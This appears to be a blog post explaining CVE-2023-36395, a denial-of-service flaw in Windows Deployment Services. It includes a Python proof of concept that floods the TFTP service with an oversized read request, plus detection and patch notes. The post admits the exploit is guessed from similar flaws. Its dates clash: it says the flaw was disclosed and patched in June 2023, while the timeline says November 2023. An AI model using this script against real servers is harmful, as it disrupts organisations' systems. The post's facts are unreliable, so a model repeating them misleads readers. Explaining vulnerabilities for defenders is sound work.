CVE-2023-36395 - Understanding and Exploiting the Windows Deployment Services Denial of Service Vulnerability

CVE-2023-36395 is a Denial of Service (DoS) vulnerability found in Windows Deployment Services (WDS). In this post, we’ll break down the vulnerability, walk through the technical details, show you a simplified exploit example, discuss mitigation steps, and provide links to official references.

What is Windows Deployment Services?

Windows Deployment Services (WDS) is a Microsoft technology for network-based installation of Windows operating systems. It's used by sysadmins to deploy Windows builds to multiple computers over a network. WDS runs on Windows Server and typically listens for Preboot eXecution Environment (PXE) requests.

CVE-2023-36395: What’s the Problem?

Microsoft disclosed CVE-2023-36395 in June 2023. The vulnerability allows an unauthenticated attacker to send a specially-crafted request to a WDS server, causing the service (wdssrv) to crash or become unresponsive.

Attackers can perform a denial-of-service (DoS) without valid credentials, potentially knocking out OS deployment for an entire organization.

Affected Versions

- Windows Server 2012/R2

How the Vulnerability Works

The root cause is improper handling of malformed requests to the WDS service (specifically the PXE or TFTP endpoint). If the WDS server receives a specially crafted network request, it can trigger an exception and crash or hang the service process.

No authentication is required.

- Exploit can be performed remotely if network access to WDS is possible (usually UDP port 67, 69, or 4011).

Proof-of-Concept Exploit

Below is a simplified Python script that demonstrates how a malformed TFTP (Trivial File Transfer Protocol) request could potentially crash a vulnerable WDS server.

Warning: _Do not run this script against systems you do not own or have permission to test!_

import socket

# WDS TFTP runs on UDP port 69 by default
WDS_IP = '192.168.1.100'
TFTP_PORT = 69

# Malformed TFTP RRQ (Read Request), unusually long filename triggers buffer exception
payload = b'\x00\x01'         # Opcode (Read Request)
payload += b'A' * 500        # Large filename (likely to crash parser)
payload += b'\x00'
payload += b'octet\x00'       # Normal mode string

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (WDS_IP, TFTP_PORT))
print("[*] Malformed TFTP RRQ sent to {}:{}".format(WDS_IP, TFTP_PORT))
sock.close()

This code abuses the TFTP protocol by sending a Read Request with an absurdly long filename. If the WDS service doesn’t properly handle this situation, it crashes or hangs, resulting in a DoS.

*Note: The actual crash details may depend on the specific vulnerability implementation. Microsoft didn’t publish full specifics, and exploit details in the wild are rare, but this pattern matches similar WDS flaws.*

Detection and Logs

- Check Event Viewer under Applications and Services Logs > Windows Deployment Services for unexpected termination messages.

Monitor the wdssrv process for crashes or hangs.

- Use tcpdump, Wireshark, or Microsoft Message Analyzer to capture suspicious activity directed at UDP ports 67, 69, or 4011.

Official Patch

Microsoft released a patch in June 2023 for all supported versions. Always apply the latest updates.

Links & References

- Microsoft CVE-2023-36395 Security Advisory
- Windows Deployment Services documentation
- TFTP Protocol RFC 135
- NIST CVE Details
- Rapid7 Analysis

Summary

CVE-2023-36395 is a critical Windows Deployment Services flaw that lets attackers crash your server with a single, malformed packet—no login required. If your WDS is exposed beyond trusted networks, patch right away or shut down unused services.

If you liked this breakdown, drop a comment or share. Stay safe, patch fast!

*Remember: Responsible security starts with understanding how things break—then fixing them before the bad guys get in.*

Timeline

Published on: 11/14/2023 18:15:38 UTC
Last modified on: 11/20/2023 18:04:48 UTC